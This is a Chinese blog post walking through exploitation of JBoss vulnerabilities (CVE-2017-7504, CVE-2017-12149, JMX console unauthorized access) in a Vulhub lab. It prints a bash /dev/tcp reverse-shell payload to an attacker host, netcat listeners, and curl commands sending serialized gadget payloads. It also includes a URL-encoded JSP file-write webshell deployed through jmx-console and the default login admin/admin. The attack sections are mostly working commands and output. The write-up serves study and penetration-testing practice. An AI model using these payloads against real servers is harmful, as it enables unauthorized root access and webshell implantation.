JBoss 相关漏洞复现及利用

最新推荐文章于 2024-04-25 12:32:22 发布
最新推荐文章于 2024-04-25 12:32:22 发布
阅读量1k 收藏 1
点赞数 1
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/132907321
版权

JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

一、漏洞环境

使用Vulhub靶场环境,\vulhub-master\jboss\CVE-2017-7504目录下,docker启动环境

docker-compose up -d

 查看启动状态 docker-compose ps

 显示服务已启动,访问靶机地址8080端口,服务已成功启动

二、信息收集

使用whatweb探查目标站点指纹信息,参数说明,-v详细列出指纹信息,--url-suffix= 拼接url后缀

whatweb -v http://192.168.227.129 --url-suffix=":8080"

探查到目标使用JBoss 4.0.5.GA,可针对此信息,展开 漏洞利用尝试。

三、 JBossMQ JMS 反序列化漏洞(CVE-2017-7504) 

vulhub靶机:192.168.227.129

kali攻击机:192.168.227.128

靶机服务docker启动,在vulhub/jboss/CVE-2017-7504目录下

docker-compose up -d

访问靶机8080端口,漏洞环境已成功启动

访问/jbossmq-httpil/HTTPServerILServlet路径,返回如下页面,则可能存在该漏洞

这里用到JavaDeserH2HC-master工具,实现漏洞利用

https://github.com/joaomatosf/JavaDeserH2HC

kali进入到JavaDeserH2HC的文件下,执行编译生成恶意java类

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

生成ser文件,ser全称serialize,序列化恶意数据至文件。

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.227.128/8888 0>&1"

 kali开启监听端口8888

nc -lvp 8888

使用curl,以二进制方式post发送数据 ,--data-binary意为二进制方式的post传送

curl http://192.168.227.129:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

 监听位置则反弹一个shell,且为root权限

四、jboss 反序列化 (CVE-2017-12149)

vulhub靶机:192.168.227.129

kali攻击机:192.168.227.128

靶机服务docker启动,在/vulhub/jboss/CVE-2017-12149目录下

docker-compose up -d

访问靶机8080端口,漏洞环境已成功启动

访问目标靶机/invoker/readonly路径,若状态码500返回如下页面,则可能存在该漏洞

 依然使用JavaDeserH2HC工具,进行漏洞的复现利用

攻击机进入到JavaDeserH2HC的文件下,执行编译生成恶意java类

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

修改接收shell的IP和端口 

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.227.128:8888

开启攻击机端口监听8888 

nc -lvp 8888

利用curl,发送恶意数据到目标站点

curl http://192.168.227.129:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 监听端口返回一个shell,权限为 root

五、JMX Console未授权访问 

默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

需要验证的时候可以尝试弱口令登陆进入。admin\admin

能够进入jmx-console后,我们开始部署war包。

http://192.168.227.129/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hack.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

这里arg0代表war包的名称、arg1=文件名称  、arg2=文件后缀名、arg3=文件内容。

arg3解码后的内容:<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>(f表示文件名,t表示文件内容)

执行成功,回到jmx-console下,找到jboss.web.deployment下,可以看到我们的hack.wa已成功部署。

我们写入一个1.txt文件进行测试。

http://ip/hack/shell.jsp?f=1.txt&t=hello world!

 访问查看,文件确实被成功写入,后续可以依此法写入webshell。

 

LZ_KaiHuang
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Jboss漏洞利用小工具
11-06
jboss利用 jboss漏洞
Struts2及jboss漏洞利用工具
08-06
Struts2及jboss漏洞利用工具。非常好用本人几经尝试过。 Struts2的漏洞实用工具 ,以及jboss的jar cmd运行代码,良心出品
JBoss历史漏洞汇总与
m0_48108919的博客
04-02 6718
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
JBoss中间件漏洞汇总
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
JBoss漏洞(保姆级教学)
最新发布
m0_69043895的博客
04-25 613
漏洞原理:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
JBOSS漏洞
weixin_30488313的博客
04-26 696
  JBOSS:是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。   JBOSS 端口号:8080   默认密码 :admin ...
jboss漏洞
赵花花08042的博客
12-13 718
JBoss JMXInvokerServlet 反序列化漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
vulhub漏洞-jboss反序列化漏洞
weixin_45095113的博客
12-21 634
vulhub漏洞-jboss反序列化漏洞
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)
网络安全领域___专研者.
11-28 1535
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
JBOSS未授权漏洞总结
m0_64481831的博客
04-03 962
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS未授权访问漏洞介绍漏洞原理JBOSS未授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
智能一代云平台(十):Jboss远程访问流程总结
热门推荐
通往精英的成长之路
02-05 1万+
【前言】 最近在做一个EJB相关的项目,在做的过程用到了远程调用的相关东西,自己进行一下梳理和总结,在此与大家分享。 【相关流程】 一、对EJB和Jboss两者梳理: 1、小感:大多数情况下,提到两者中的一者,就会提起另一者;刚开始的时候自己也是对这两个东西比较混淆,最近在项目中用出了些问题,自己查找资料将其梳理一下,原来一些模糊的地方逐渐清晰起来...
Jboss历史漏洞利用 - JMX Console 未授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2171
Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
JBoss反序列化
weixin_41438728的博客
11-16 2084
这里写目录标题基础知识原理CVE-2017-12149CVE-2017-7504验证思路-CVE-2017-12149-CVE-2017-7504 基础知识 序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实序列化,ObjectInputStream类的readObject()方法用于反序列化。 形成漏洞的根源在于类ObjectInputStream在反序
Jboss相关漏洞
谢公子的博客
01-08 2720
目录 Jboss JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501) JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) Jboss管理控制台 Jboss4.x Jboss5.x/6.x jboss4.x jmx-console管...
一次老版本jboss反序列化漏洞利用分析
C20220511的博客
09-28 1208
所以我们直接利用ysoserial的Hibernate1利用链是不能成功的,但是仔细对Hibernate1利用链进行分析可以看出漏洞利用过程中的调用栈中并没有涉及到上述不存在的类,上述不存在的类主要用于设置一些类的属性字段,可以通过其他类来代替。这里可以看出jboss中引入的是CommonsCollections2.1的版本,而一般我们平时能利用的版本都是3.x。调试反序列化利用链的代码是一个很麻烦的事情,有兴趣的小伙伴可以把我上面的代码去跟一下,其中主要用到的调用过程如下。
tomcat weblogic jboss 漏洞
12-16
过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能会被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值